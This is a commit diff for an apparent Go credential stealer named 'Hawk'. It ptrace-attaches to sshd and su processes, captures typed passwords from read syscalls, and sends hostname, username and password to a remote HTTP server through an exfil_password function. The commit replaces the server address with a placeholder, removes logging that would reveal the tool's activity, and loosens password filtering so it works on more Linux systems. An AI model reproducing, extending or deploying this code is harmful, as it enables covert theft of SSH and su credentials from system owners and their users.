fix: making more universal for linux os

main.go

@@ -52,7 +52,7 @@ func exfil_password(username, password string) {
 	if err != nil {
 		return
 	}
-	serverURL := "http://10.159.76.35:6969/"
+	serverURL := "http://fill:6969/"
 	values := url.Values{}
 	values.Set("hostname", hostname)
 	values.Set("username", username)
@@ -75,7 +75,6 @@ func main() {
 				if !processedFirstPID {
 					processedFirstPID = true
 				} else {
-					fmt.Println("SSHD process found with PID:", pid)
 					go traceSSHDProcess(pid)
 					processed_pids = append(processed_pids, pid)
 				}
@@ -84,7 +83,6 @@ func main() {
 				if !processedFirstPID {
 					processedFirstPID = true
 				} else {
-					fmt.Println("SU process found with PID:", pid)
 					go traceSUProcess(pid)
 					processed_pids = append(processed_pids, pid)
 				}

ssh_tracer.go

@@ -5,18 +5,16 @@ import (
 	"io/ioutil"
 	"regexp"
 	"syscall"
+	"unicode"
 )
 
 func traceSSHDProcess(pid int) {
-	fmt.Printf("[Hawk] SSH Connection Identified on pid: %d.\n", pid)
-
 	err := syscall.PtraceAttach(pid)
 	if err != nil {
 		return
 	}
 	defer func() {
 		syscall.PtraceDetach(pid)
-		fmt.Printf("[Hawk] Detached from pid: %d.\n", pid)
 	}()
 
 	var wstatus syscall.WaitStatus
@@ -35,7 +33,6 @@ func traceSSHDProcess(pid int) {
 			var regs syscall.PtraceRegs
 			err := syscall.PtraceGetRegs(pid, &regs)
 			if err != nil {
-				fmt.Println("PtraceGetRegs:", err)
 				syscall.PtraceDetach(pid)
 				return
 			}
@@ -53,14 +50,10 @@ func traceSSHDProcess(pid int) {
 					if len(matches) == 2 {
 						username = string(matches[1])
 					}
-					var password = string(buffer)
-					valid := regexp.MustCompile(`\x00\x00\x00[^\n]*\f$`).MatchString(password)
-					if !valid {
-						fmt.Printf("Username: %q, Password %q\n", username, password)
-						go exfil_password(username, removeFirstFourBytes(password))
+					var password = removeNonPrintableAscii(string(buffer))
+					if len(password) > 2 && len(password) < 250 {
+						go exfil_password(username, removeNonPrintableAscii(password))
 					}
-				} else {
-					fmt.Printf("rdi: %d, rax: %d\n", regs.Rdi, regs.Orig_rax)
 				}
 			}
 		}
@@ -72,9 +65,14 @@ func traceSSHDProcess(pid int) {
 	}
 }
 
-func removeFirstFourBytes(input string) string {
-	if len(input) < 4 {
-		return ""
+func removeNonPrintableAscii(input string) string {
+	var resultBuilder []rune
+
+	for _, char := range input {
+		if unicode.IsPrint(char) && char >= 32 && char != 127 {
+			resultBuilder = append(resultBuilder, char)
+		}
 	}
-	return input[4:]
+
+	return string(resultBuilder)
 }

su_tracer.go

@@ -9,13 +9,11 @@ import (
 )
 
 func traceSUProcess(pid int) {
-	fmt.Printf("[Hawk] SU Connection Identified on pid: %d.\n", pid)
 	err := syscall.PtraceAttach(pid)
 	if err != nil {
 		return
 	}
 	defer func() {
-		fmt.Printf("[Hawk] Detached from pid: %d.\n", pid)
 		syscall.PtraceDetach(pid)
 	}()
 	var wstatus syscall.WaitStatus
@@ -34,11 +32,10 @@ func traceSUProcess(pid int) {
 		var regs syscall.PtraceRegs
 		ptrace_err := syscall.PtraceGetRegs(pid, &regs)
 		if ptrace_err != nil {
-			fmt.Println("PtraceGetRegs:", ptrace_err)
 			syscall.PtraceDetach(pid)
 			return
 		}
-		if regs.Orig_rax == 0 && regs.Rdx == 511 && regs.Rdi == 0 {
+		if regs.Orig_rax == 0 && regs.Rdi == 0 {
 			readSyscallCount++
 			if readSyscallCount == 3 {
 				buffer := make([]byte, regs.Rdx)
@@ -64,14 +61,11 @@ func traceSUProcess(pid int) {
 						}
 						return true
 					}(password) {
-						fmt.Printf("Username: %q, Password %q\n", username, password)
 						go exfil_password(username, password)
 					}
 				}
 			}
-
 		}
-
 		err = syscall.PtraceSyscall(pid, 0)
 		if err != nil {
 			return